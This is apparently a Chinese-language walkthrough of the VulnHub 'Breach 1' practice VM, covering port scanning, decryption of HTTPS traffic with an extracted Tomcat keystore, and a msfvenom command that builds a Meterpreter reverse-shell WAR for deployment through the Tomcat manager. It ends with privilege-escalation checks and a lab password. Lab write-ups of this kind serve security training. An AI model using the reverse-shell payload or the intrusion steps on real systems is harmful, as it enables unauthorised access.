靶场环境
https://www.vulnhub.com/
配置靶机网络

工具准备
准备一个kali

burpsuite
wireshark
CTF编码工具
kali反弹 192.168.110.128
breach1 192.168.110.140
kali攻击 192.168.202.129
端口扫描信息收集
nmap -T4 -A -v 192.168.110.140


得到这么多端口,猜测可能是添加了一些安全产品
思路:按照常用的端口为80,打开网站看看

思路:翻译看看
思路:保存图片到本地,打开stu.baidu.com查看这张图的来源


思路:查看一下源码

思路:想想编码的特征



思路:猜测这个很可能是用户名和密码
看到鼠标一接近那个图片就会变成手的形状,可以点点看
思路:使用目录扫描dirb

没有什么发现
指纹识别
-
Wappalyzer安装插件

- whatweb
- msf


全部尝试一下,发现都不成功
CMS后台信息收集






这是一个密钥库的文件
解密HTTPS流量

HTTP的端口为8443


补充:使用keytool.exe生成一个密钥库

查看密钥库的内容

生成证书
提取证书
keytool -importkeystore -srckeystore D:\vulnhub\2-breach1\keystore -destkeystore D:\vulnhub\2-breach1\tomcat.p12 -deststoretype PKCS12 -srcalias tomcat

新版本为TLS

过滤查看一下数据包
ip.src ==192.168.110.140 || ip.dst == 192.168.110.140 and http

获取的证书是不安全,服务器不接受

Tomcat后台利用
利用Kali-129生成木马
msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.110.128 lport=4444 -f war -o kali.war



点击/kali
迅速放包


Linux提权
1,搜索漏洞
2,find ; ls -a
3,history
4,sudo -l
5,uname -a







没有什么,乖乖的从头开始


尝试登录




密码为coffeestains




